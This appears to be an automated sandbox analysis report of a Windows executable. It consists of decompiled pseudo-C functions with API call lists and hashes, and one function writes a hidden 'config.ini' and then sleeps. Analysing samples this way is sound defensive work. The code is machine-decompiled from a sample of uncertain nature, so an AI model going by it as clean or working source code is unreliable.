                                                                                                                • LockResource.KERNEL32(?,00000028,0126147C), ref: 01267724
                                                                                                                • GetDesktopWindow.USER32 ref: 0126775C
                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 01267767
                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 01267773
                                                                                                                  • Part of subcall function 0126F89B: IsWindowEnabled.USER32(?), ref: 0126F8A7
                                                                                                                  • Part of subcall function 0126F2A6: EnableWindow.USER32(?,00000028), ref: 0126F2B8
                                                                                                                • EnableWindow.USER32(00000000,?), ref: 01267848
                                                                                                                • GetActiveWindow.USER32 ref: 01267852
                                                                                                                • SetActiveWindow.USER32(00000000,?,00000028,0126147C), ref: 0126785E
                                                                                                                • FreeResource.KERNEL32(?,?,00000028,0126147C), ref: 0126787A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchHookLoadLockUnhookWindows
                                                                                                                • String ID:
                                                                                                                • API String ID: 964565984-0
                                                                                                                • Opcode ID: 4b4580ced7eec56af074ec230e403bdd3511e15a8acc1a2b3d927fc4ba342639
                                                                                                                • Instruction ID: 2d10926e941731185066bea5842fdc78f387bf31bbd4f7d477262e7c555e2c6e
                                                                                                                • Opcode Fuzzy Hash: 4b4580ced7eec56af074ec230e403bdd3511e15a8acc1a2b3d927fc4ba342639
                                                                                                                • Instruction Fuzzy Hash: 6E5156349202069FDF25AFB8E588ABEBBB9BF54718F10001DE615A32D0DB7489C1CF61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 012703C7, Relevance: 16.6, APIs: 11, Instructions: 106memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 76%
                                                                                                                			E012703C7(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				int _v12;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t67;
				void* _t68;
				void* _t69;
				int _t85;
				long _t95;
				signed char* _t97;
				signed int _t100;
				long* _t103;
				intOrPtr _t106;
				long* _t108;
				intOrPtr _t114;
				signed int _t115;
				void* _t118;
				signed int _t120;
				struct _CRITICAL_SECTION* _t123;
				void* _t124;
				void* _t125;
				signed int _t128;
				struct _CRITICAL_SECTION* _t129;

				_push(__ecx);
				_t118 = __ecx;
				_t1 = _t118 + 0x1c; // 0x1389e70
				_t123 = _t1;
				EnterCriticalSection(_t123);
				_t2 = _t118 + 4; // 0x20
				_t106 =  *_t2;
				_t3 = _t118 + 8; // 0x3
				_t100 =  *_t3;
				if(_t100 >= _t106) {
					L2:
					_t100 = 1;
					if(_t106 <= 1) {
						L7:
						_t13 = _t106 + 0x20; // 0x40
						_t64 = _t13;
						_v8 = _t13;
						if( *(_t118 + 0x10) != 0) {
							_t15 = _t118 + 0x10; // 0x14dfed0
							_t124 = GlobalHandle( *_t15);
							GlobalUnlock(_t124);
							_t67 = E01267FCE(_t100, _t106, _t118, _t124, _v8, 8);
							_t108 = 0x2002;
							_t68 = GlobalReAlloc(_t124, _t67, ??);
							_t17 = _t118 + 0x1c; // 0x1389e70
							_t123 = _t17;
						} else {
							_t95 = E01267FCE(_t100, _t106, _t118, _t123, _t64, 8);
							_pop(_t108);
							_t68 = GlobalAlloc(2, _t95); // executed
						}
						if(_t68 != 0) {
							_t69 = GlobalLock(_t68);
							_t19 = _t118 + 4; // 0x20
							_t125 = _t69;
							E01283870(_t125 +  *_t19 * 8, 0, _v8 -  *_t19 << 3);
							 *(_t118 + 0x10) = _t125;
							_t25 = _t118 + 0x1c; // 0x1389e70
							_t123 = _t25;
							 *(_t118 + 4) = _v8;
							goto L14;
						} else {
							if( *(_t118 + 0x10) != _t68) {
								_t37 = _t118 + 0x10; // 0x14dfed0
								GlobalLock(GlobalHandle( *_t37));
							}
							LeaveCriticalSection(_t123);
							E0126828F(_t108);
							asm("int3");
							_push(_t108);
							_push(_t100);
							_push(_t123);
							_push(_t118);
							_t120 = _v8;
							_t128 = 1;
							_t103 = _t108;
							_v20 = 1;
							if( *((intOrPtr*)(_t120 + 8)) <= 1) {
								L31:
								_t129 =  &(_t103[7]);
								EnterCriticalSection(_t129);
								E01270793( &(_t103[5]), _t120);
								LeaveCriticalSection(_t129);
								LocalFree( *(_t120 + 0xc));
								 *((intOrPtr*)( *_t120))("true");
								_t85 = TlsSetValue( *_t103, 0);
							} else {
								_t114 = _a4;
								do {
									if(_t114 == 0 ||  *((intOrPtr*)(_t103[4] + 4 + _t128 * 8)) == _t114) {
										_t115 =  *( *(_t120 + 0xc) + _t128 * 4);
										if(_t115 != 0) {
											 *((intOrPtr*)( *_t115))("true");
										}
										_t114 = _a4;
										 *( *(_t120 + 0xc) + _t128 * 4) =  *( *(_t120 + 0xc) + _t128 * 4) & 0x00000000;
										goto L28;
									} else {
										if( *( *(_t120 + 0xc) + _t128 * 4) == 0) {
											L28:
										} else {
											_t85 = 0;
											_v12 = 0;
										}
									}
									_t128 = _t128 + 1;
								} while (_t128 <  *((intOrPtr*)(_t120 + 8)));
								if(_t85 != 0) {
									goto L31;
								}
							}
							return _t85;
						}
					} else {
						_t9 = _t118 + 0x10; // 0x14dfed0
						_t97 =  *_t9 + 8;
						while(( *_t97 & 0x00000001) != 0) {
							_t100 = _t100 + 1;
							_t97 =  &(_t97[8]);
							if(_t100 < _t106) {
								continue;
							}
							break;
						}
						if(_t100 < _t106) {
							goto L14;
						} else {
							goto L7;
						}
					}
				} else {
					_t4 = _t118 + 0x10; // 0x14dfed0
					if(( *( *_t4 + _t100 * 8) & 0x00000001) == 0) {
						L14:
						_t27 = _t118 + 0xc; // 0x3
						if(_t100 >=  *_t27) {
							_t28 = _t100 + 1; // 0x4
							 *((intOrPtr*)(_t118 + 0xc)) = _t28;
						}
						_t30 = _t118 + 0x10; // 0x14dfed0
						 *( *_t30 + _t100 * 8) =  *( *_t30 + _t100 * 8) | 0x00000001;
						_t35 = _t100 + 1; // 0x4
						 *(_t118 + 8) = _t35;
						LeaveCriticalSection(_t123);
						return _t100;
					} else {
						goto L2;
					}
				}
			}





























                                                                                                                0x012703ca
                                                                                                                0x012703ce
                                                                                                                0x012703d0
                                                                                                                0x012703d0
                                                                                                                0x012703d4
                                                                                                                0x012703da
                                                                                                                0x012703da
                                                                                                                0x012703dd
                                                                                                                0x012703dd
                                                                                                                0x012703e2
                                                                                                                0x012703f1
                                                                                                                0x012703f3
                                                                                                                0x012703f6
                                                                                                                0x01270413
                                                                                                                0x01270417
                                                                                                                0x01270417
                                                                                                                0x0127041a
                                                                                                                0x0127041d
                                                                                                                0x01270434
                                                                                                                0x0127043d
                                                                                                                0x01270440
                                                                                                                0x01270450
                                                                                                                0x01270456
                                                                                                                0x01270459
                                                                                                                0x0127045f
                                                                                                                0x0127045f
                                                                                                                0x0127041f
                                                                                                                0x01270422
                                                                                                                0x01270428
                                                                                                                0x0127042c
                                                                                                                0x0127042c
                                                                                                                0x01270464
                                                                                                                0x0127046e
                                                                                                                0x01270474
                                                                                                                0x01270477
                                                                                                                0x01270488
                                                                                                                0x01270493
                                                                                                                0x01270496
                                                                                                                0x01270496
                                                                                                                0x01270499
                                                                                                                0x00000000
                                                                                                                0x01270466
                                                                                                                0x01270469
                                                                                                                0x012704c4
                                                                                                                0x012704ce
                                                                                                                0x012704ce
                                                                                                                0x012704d5
                                                                                                                0x012704db
                                                                                                                0x012704e0
                                                                                                                0x012704e4
                                                                                                                0x012704e5
                                                                                                                0x012704e6
                                                                                                                0x012704e7
                                                                                                                0x012704e8
                                                                                                                0x012704ef
                                                                                                                0x012704f1
                                                                                                                0x012704f3
                                                                                                                0x012704f9
                                                                                                                0x01270542
                                                                                                                0x01270542
                                                                                                                0x01270546
                                                                                                                0x01270550
                                                                                                                0x01270556
                                                                                                                0x0127055f
                                                                                                                0x0127056b
                                                                                                                0x01270571
                                                                                                                0x012704fb
                                                                                                                0x012704fb
                                                                                                                0x012704fe
                                                                                                                0x01270500
                                                                                                                0x0127051e
                                                                                                                0x01270523
                                                                                                                0x01270529
                                                                                                                0x01270529
                                                                                                                0x0127052e
                                                                                                                0x01270531
                                                                                                                0x00000000
                                                                                                                0x0127050b
                                                                                                                0x01270512
                                                                                                                0x01270535
                                                                                                                0x01270514
                                                                                                                0x01270514
                                                                                                                0x01270516
                                                                                                                0x01270516
                                                                                                                0x01270512
                                                                                                                0x01270538
                                                                                                                0x01270539
                                                                                                                0x01270540
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01270540
                                                                                                                0x0127057d
                                                                                                                0x0127057d
                                                                                                                0x012703f8
                                                                                                                0x012703f8
                                                                                                                0x012703fb
                                                                                                                0x012703fe
                                                                                                                0x01270403
                                                                                                                0x01270404
                                                                                                                0x01270409
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01270409
                                                                                                                0x0127040d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0127040d
                                                                                                                0x012703e4
                                                                                                                0x012703e4
                                                                                                                0x012703eb
                                                                                                                0x0127049c
                                                                                                                0x0127049c
                                                                                                                0x0127049f
                                                                                                                0x012704a1
                                                                                                                0x012704a4
                                                                                                                0x012704a4
                                                                                                                0x012704a7
                                                                                                                0x012704ab
                                                                                                                0x012704af
                                                                                                                0x012704b2
                                                                                                                0x012704b5
                                                                                                                0x012704c3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012703eb

                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(01389E70,?,?,00000000,01389E54,?,012706DA,00000004,012692B4,01266D6E,012692DD,01266B4B,01296BCA,?,?,00000000), ref: 012703D4
                                                                                                                • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,00000000,01389E54,?,012706DA,00000004,012692B4,01266D6E,012692DD,01266B4B,01296BCA), ref: 0127042C
                                                                                                                • GlobalHandle.KERNEL32(014DFED0), ref: 01270437
                                                                                                                • GlobalUnlock.KERNEL32(00000000,?,?,00000000,01389E54,?,012706DA,00000004,012692B4,01266D6E,012692DD,01266B4B,01296BCA,?,?,00000000), ref: 01270440
                                                                                                                • GlobalReAlloc.KERNEL32 ref: 01270459
                                                                                                                • GlobalLock.KERNEL32 ref: 0127046E
                                                                                                                • _memset.LIBCMT ref: 01270488
                                                                                                                • LeaveCriticalSection.KERNEL32(01389E70), ref: 012704B5
                                                                                                                • GlobalHandle.KERNEL32(014DFED0), ref: 012704C7
                                                                                                                • GlobalLock.KERNEL32 ref: 012704CE
                                                                                                                • LeaveCriticalSection.KERNEL32(01389E70,?,?,00000000,01389E54,?,012706DA,00000004,012692B4,01266D6E,012692DD,01266B4B,01296BCA,?,?,00000000), ref: 012704D5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 496899490-0
                                                                                                                • Opcode ID: 5a3614038889dec1cc5e63d3e99215c9fddee590e294ff7e880a7399df0b94c1
                                                                                                                • Instruction ID: 5e8573682229f0481097311dfdb09e1dd03fc9bba7f650340f72914bd5f0ba72
                                                                                                                • Opcode Fuzzy Hash: 5a3614038889dec1cc5e63d3e99215c9fddee590e294ff7e880a7399df0b94c1
                                                                                                                • Instruction Fuzzy Hash: 8631F271A11706BFDB24CF68E888A6AB7B8FF01315B10426DF901D3680C771B9A5CBA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0126D98F, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 101COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 97%
                                                                                                                			E0126D98F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				_Unknown_base(*)()* _t30;
				signed int _t35;
				long _t38;
				long _t53;
				void* _t55;
				void* _t56;
				void* _t61;
				void* _t65;
				struct HWND__* _t67;
				long _t69;
				CHAR* _t70;
				void* _t71;

				_t65 = __edx;
				_push(0x4c);
				E01285C19(E012973BB, __ebx, __edi, __esi);
				_t67 =  *(_t71 + 8);
				_t53 =  *(_t71 + 0x14);
				 *(_t71 - 0x34) = _t67;
				 *(_t71 - 0x30) = _t53;
				_t30 = GetPropA(_t67, "AfxOldWndProc423");
				_t69 = 0;
				 *(_t71 - 0x2c) = _t30;
				 *((intOrPtr*)(_t71 - 4)) = 0;
				_t55 =  *(_t71 + 0xc) - 6;
				if(_t55 == 0) {
					 *((intOrPtr*)(_t71 - 0x28)) = E0126B33E(_t53, _t55, _t65, _t53);
					E0126DDCB(_t55, _t65, E0126B33E(_t53, _t55, _t65, _t67),  *(_t71 + 0x10),  *((intOrPtr*)(_t71 - 0x28)));
					_t35 = 1;
					goto L8;
				} else {
					_t56 = _t55 - 0x1a;
					if(_t56 == 0) {
						_t35 = 0 | E0126DE42(_t53, _t65, _t67, E0126B33E(_t53, _t56, _t65, _t67), _t53, _t53 >> 0x10) == 0x00000000;
						L8:
						if(_t35 != 0) {
							goto L9;
						}
					} else {
						_t61 = _t56 - 0x62;
						if(_t61 == 0) {
							SetWindowLongA(_t67, 0xfffffffc, _t30);
							_t70 = "AfxOldWndProc423";
							RemovePropA(_t67, _t70);
							GlobalDeleteAtom(GlobalFindAtomA(_t70) & 0x0000ffff);
							L9:
							_t30 =  *(_t71 - 0x2c);
							goto L10;
						} else {
							_t62 = _t61 != 0x8e;
							if(_t61 != 0x8e) {
								L10:
								_t38 = CallWindowProcA(_t30, _t67,  *(_t71 + 0xc),  *(_t71 + 0x10), _t53); // executed
								_t69 = _t38;
							} else {
								 *((intOrPtr*)(_t71 - 0x24)) = 0;
								 *((intOrPtr*)(_t71 - 0x20)) = 0;
								 *((intOrPtr*)(_t71 - 0x1c)) = 0;
								 *((intOrPtr*)(_t71 - 0x18)) = 0;
								 *((intOrPtr*)(_t71 - 0x28)) = E0126B33E(_t53, _t62, _t65, _t67);
								E0126DFC5(_t47, _t71 - 0x24, _t71 - 0x38);
								_t69 = CallWindowProcA( *(_t71 - 0x2c), _t67, 0x110,  *(_t71 + 0x10), _t53);
								E0126DF24(_t53, _t65,  *((intOrPtr*)(_t71 - 0x28)), _t71 - 0x24,  *((intOrPtr*)(_t71 - 0x38)));
							}
						}
					}
				}
				return E01285B6B(_t53, _t67, _t69);
			}















                                                                                                                0x0126d98f
                                                                                                                0x0126d98f
                                                                                                                0x0126d996
                                                                                                                0x0126d99b
                                                                                                                0x0126d99e
                                                                                                                0x0126d9a7
                                                                                                                0x0126d9aa
                                                                                                                0x0126d9ad
                                                                                                                0x0126d9b6
                                                                                                                0x0126d9b8
                                                                                                                0x0126d9bb
                                                                                                                0x0126d9be
                                                                                                                0x0126d9c1
                                                                                                                0x0126da7f
                                                                                                                0x0126da8e
                                                                                                                0x0126da95
                                                                                                                0x00000000
                                                                                                                0x0126d9c7
                                                                                                                0x0126d9c7
                                                                                                                0x0126d9ca
                                                                                                                0x0126da73
                                                                                                                0x0126da96
                                                                                                                0x0126da98
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0126d9d0
                                                                                                                0x0126d9d0
                                                                                                                0x0126d9d3
                                                                                                                0x0126da31
                                                                                                                0x0126da37
                                                                                                                0x0126da3e
                                                                                                                0x0126da4f
                                                                                                                0x0126da9a
                                                                                                                0x0126da9a
                                                                                                                0x00000000
                                                                                                                0x0126d9d5
                                                                                                                0x0126d9d5
                                                                                                                0x0126d9db
                                                                                                                0x0126da9d
                                                                                                                0x0126daa6
                                                                                                                0x0126daac
                                                                                                                0x0126d9e1
                                                                                                                0x0126d9e2
                                                                                                                0x0126d9e5
                                                                                                                0x0126d9e8
                                                                                                                0x0126d9eb
                                                                                                                0x0126d9f6
                                                                                                                0x0126d9ff
                                                                                                                0x0126da1a
                                                                                                                0x0126da23
                                                                                                                0x0126da23
                                                                                                                0x0126d9db
                                                                                                                0x0126d9d3
                                                                                                                0x0126d9ca
                                                                                                                0x0126daf3

                                                                                                                APIs
                                                                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 0126D996
                                                                                                                • GetPropA.USER32 ref: 0126D9AD
                                                                                                                • CallWindowProcA.USER32 ref: 0126DA11
                                                                                                                  • Part of subcall function 0126DF24: GetWindowRect.USER32 ref: 0126DF65
                                                                                                                  • Part of subcall function 0126DF24: GetWindow.USER32(?,00000004), ref: 0126DF82
                                                                                                                • SetWindowLongA.USER32 ref: 0126DA31
                                                                                                                • RemovePropA.USER32 ref: 0126DA3E
                                                                                                                • GlobalFindAtomA.KERNEL32 ref: 0126DA45
                                                                                                                • GlobalDeleteAtom.KERNEL32 ref: 0126DA4F
                                                                                                                  • Part of subcall function 0126DFC5: GetWindowRect.USER32 ref: 0126DFD2
                                                                                                                • CallWindowProcA.USER32 ref: 0126DAA6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catch_LongRemove
                                                                                                                • String ID: AfxOldWndProc423
                                                                                                                • API String ID: 3351853316-1060338832
                                                                                                                • Opcode ID: ef030186d11a6ea5964f22defef3ef0959bddda2f6a9e5b980308fafdacaeeb0
                                                                                                                • Instruction ID: f3347ae12282c4ae038703b41df57ea849cd018104c4b55a0f32cf9c97b475b2
                                                                                                                • Opcode Fuzzy Hash: ef030186d11a6ea5964f22defef3ef0959bddda2f6a9e5b980308fafdacaeeb0
                                                                                                                • Instruction Fuzzy Hash: 9C316E71A2421EABDF15AFF8DC49CFF7EBCAF59610B04451DFA42A2180C6758D90CB64
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01262650, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 55filesleepCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 92%
                                                                                                                			E01262650(void* __ebx, void* __edx, void* __edi) {
				signed int _v8;
				char _v12;
				char _v16;
				long _v20;
				void* __esi;
				void* __ebp;
				signed int _t9;
				void* _t11;
				void* _t23;
				void* _t28;
				void* _t31;
				signed int _t32;

				_t28 = __edx;
				_t9 =  *0x12aa3f0; // 0xddd5d539
				_v8 = _t9 ^ _t32;
				_t11 = CreateFileA("config.ini", 0x40000000, 0, 0, 2, 0x82, 0); // executed
				_t31 = _t11;
				if(_t31 != 0xffffffff) {
					_v20 = 0;
					WriteFile(_t31, "002", 3,  &_v20, 0); // executed
					FindCloseChangeNotification(_t31); // executed
					_v16 = 0x6e69614d;
					_v12 = 0;
					E01262590(__ebx, _t23,  &_v16, __edi, _t31, __eflags); // executed
					Sleep(0x1388);
					__eflags = _v8 ^ _t32;
					return E012833E5(__ebx, _v8 ^ _t32,  &_v16, __edi, _t31);
				} else {
					CloseHandle(_t11);
					E01262C9F(0);
					return E012833E5(__ebx, _v8 ^ _t32, _t28, __edi, _t31);
				}
			}















                                                                                                                0x01262650
                                                                                                                0x01262656
                                                                                                                0x0126265d
                                                                                                                0x01262678
                                                                                                                0x0126267e
                                                                                                                0x01262683
                                                                                                                0x012626ac
                                                                                                                0x012626bc
                                                                                                                0x012626c3
                                                                                                                0x012626cc
                                                                                                                0x012626d3
                                                                                                                0x012626d7
                                                                                                                0x012626e1
                                                                                                                0x012626ec
                                                                                                                0x012626f7
                                                                                                                0x01262685
                                                                                                                0x01262686
                                                                                                                0x0126268e
                                                                                                                0x012626a6
                                                                                                                0x012626a6

                                                                                                                APIs
                                                                                                                • CreateFileA.KERNELBASE(config.ini,40000000,00000000,00000000,00000002,00000082,00000000,74EBB980,?,?,?,012617AA), ref: 01262678
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,012617AA), ref: 01262686
                                                                                                                • WriteFile.KERNELBASE(00000000,002,00000003,?,00000000), ref: 012626BC
                                                                                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 012626C3
                                                                                                                • Sleep.KERNEL32(00001388), ref: 012626E1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CloseFile$ChangeCreateFindHandleNotificationSleepWrite
                                                                                                                • String ID: 002$Main$config.ini
                                                                                                                • API String ID: 2499709669-3012813008
                                                                                                                • Opcode ID: f5c6c478909f2221bbe959e45c17d070db3de710d83cdd3f826cae20389dfd31
                                                                                                                • Instruction ID: e536cf9ac62c593bae4d2a8452949ce83f020930940b14abcec53786911aa048
                                                                                                                • Opcode Fuzzy Hash: f5c6c478909f2221bbe959e45c17d070db3de710d83cdd3f826cae20389dfd31
                                                                                                                • Instruction Fuzzy Hash: 3911C470E54309ABEB20EFB8AC0EBAD7768EB04714F404199F915AB2C4DEB05A40C795
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01262A8E, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 119libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 52%
                                                                                                                			E01262A8E(void* __ebx, WCHAR* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t25;
				short _t27;
				intOrPtr* _t33;
				long _t36;
				long _t40;
				short _t47;
				void* _t49;
				void* _t51;

				_t45 = __edi;
				_t41 = __ebx;
				_push(0x268);
				_push(0x12a4ee0);
				E01283B10(__ebx, __edi, __esi);
				_t47 = 0;
				 *((intOrPtr*)(_t49 - 0x22c)) = 0;
				_t51 =  *0x138802c - _t47; // 0x0
				if(_t51 != 0 ||  *0x12aa000 != 0xffffffff) {
					L25:
					_t47 = 1;
					goto L26;
				} else {
					_t25 =  *0x1388048;
					if(_t25 != 0) {
						L5:
						_push(_t47);
						_push(8);
						_push(_t49 - 0x238);
						_push("true");
						_push(_t47);
						_t45 = 0x12aa000;
						_push(0x12aa000);
						_push(0x80000010);
						if( *_t25() == 0) {
							L26:
							return E01283B58(_t41, _t45, _t47);
						}
						_t27 =  *(_t49 - 0x238);
						if(_t27 != 0) {
							L21:
							 *0x12aa000 = _t27;
							_push(_t49 - 0x22c);
							_push(_t27);
							if(E01262887() != 0) {
								 *(_t49 - 4) = _t47;
								 *((intOrPtr*)(_t49 - 0x278)) = 0x40;
								_push(_t49 - 0x278);
								_t45 = L"Comctl32.dll";
								_push(_t45);
								_push(2);
								_push(_t47);
								_push(_t47);
								if(E0126291A() != 0) {
									LoadLibraryW(_t45);
								}
								 *(_t49 - 4) = 0xfffffffe;
								E01262C60(_t47);
							}
							goto L25;
						}
						_t33 = E012629BA(0x129978c, 0x138804c, "GetModuleHandleExW");
						if(_t33 == 0) {
							goto L26;
						}
						_push(_t49 - 0x230);
						_push(0x12aa000);
						_push(6);
						if( *_t33() == 0) {
							goto L26;
						}
						_t45 = 0x105;
						_t36 = GetModuleFileNameW( *(_t49 - 0x230), _t49 - 0x228, 0x105);
						if(_t36 == 0) {
							goto L26;
						}
						if(_t36 < 0x105) {
							 *((intOrPtr*)(_t49 - 0x258)) = 0x20;
							 *((intOrPtr*)(_t49 - 0x254)) = 0x88;
							 *((intOrPtr*)(_t49 - 0x250)) = _t49 - 0x228;
							_t45 = 3;
							 *(_t49 - 0x244) = 0x105;
							 *(_t49 - 0x23c) =  *(_t49 - 0x230);
							_push(_t49 - 0x258); // executed
							_t27 = E012628B7(); // executed
							 *(_t49 - 0x238) = _t27;
							if(_t27 != 0xffffffff) {
								L20:
								 *0x1388030 = 1;
								goto L21;
							}
							_t40 = GetLastError();
							if(_t40 == 0x714 || _t40 == 0x715 || _t40 == 0x717 || _t40 == 0x716 || _t40 == 2 || _t40 == 0x105) {
								_t27 = _t47;
								 *(_t49 - 0x238) = _t27;
								goto L20;
							} else {
								goto L26;
							}
						}
						SetLastError(0x6f);
						goto L26;
					}
					_t25 = E012629BA(0x129978c, 0x138804c, "QueryActCtxW");
					if(_t25 == 0) {
						goto L26;
					}
					 *0x1388048 = _t25;
					goto L5;
				}
			}











                                                                                                                0x01262a8e
                                                                                                                0x01262a8e
                                                                                                                0x01262a8e
                                                                                                                0x01262a93
                                                                                                                0x01262a98
                                                                                                                0x01262a9d
                                                                                                                0x01262a9f
                                                                                                                0x01262aa5
                                                                                                                0x01262aab
                                                                                                                0x01262c53
                                                                                                                0x01262c55
                                                                                                                0x00000000
                                                                                                                0x01262abe
                                                                                                                0x01262abe
                                                                                                                0x01262ac5
                                                                                                                0x01262ae8
                                                                                                                0x01262ae8
                                                                                                                0x01262ae9
                                                                                                                0x01262af1
                                                                                                                0x01262af2
                                                                                                                0x01262af4
                                                                                                                0x01262af5
                                                                                                                0x01262afa
                                                                                                                0x01262afb
                                                                                                                0x01262b04
                                                                                                                0x01262c56
                                                                                                                0x01262c5d
                                                                                                                0x01262c5d
                                                                                                                0x01262b0a
                                                                                                                0x01262b12
                                                                                                                0x01262c03
                                                                                                                0x01262c03
                                                                                                                0x01262c0e
                                                                                                                0x01262c0f
                                                                                                                0x01262c17
                                                                                                                0x01262c19
                                                                                                                0x01262c1c
                                                                                                                0x01262c2c
                                                                                                                0x01262c2d
                                                                                                                0x01262c32
                                                                                                                0x01262c33
                                                                                                                0x01262c35
                                                                                                                0x01262c36
                                                                                                                0x01262c3e
                                                                                                                0x01262c41
                                                                                                                0x01262c41
                                                                                                                0x01262c47
                                                                                                                0x01262c4e
                                                                                                                0x01262c4e
                                                                                                                0x00000000
                                                                                                                0x01262c17
                                                                                                                0x01262b27
                                                                                                                0x01262b2e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01262b3a
                                                                                                                0x01262b3b
                                                                                                                0x01262b3c
                                                                                                                0x01262b42
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01262b48
                                                                                                                0x01262b5b
                                                                                                                0x01262b63
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01262b6b
                                                                                                                0x01262b7a
                                                                                                                0x01262b84
                                                                                                                0x01262b94
                                                                                                                0x01262b9c
                                                                                                                0x01262b9d
                                                                                                                0x01262ba9
                                                                                                                0x01262bb5
                                                                                                                0x01262bb6
                                                                                                                0x01262bbb
                                                                                                                0x01262bc4
                                                                                                                0x01262bf9
                                                                                                                0x01262bf9
                                                                                                                0x00000000
                                                                                                                0x01262bf9
                                                                                                                0x01262bc6
                                                                                                                0x01262bd1
                                                                                                                0x01262bf1
                                                                                                                0x01262bf3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01262bd1
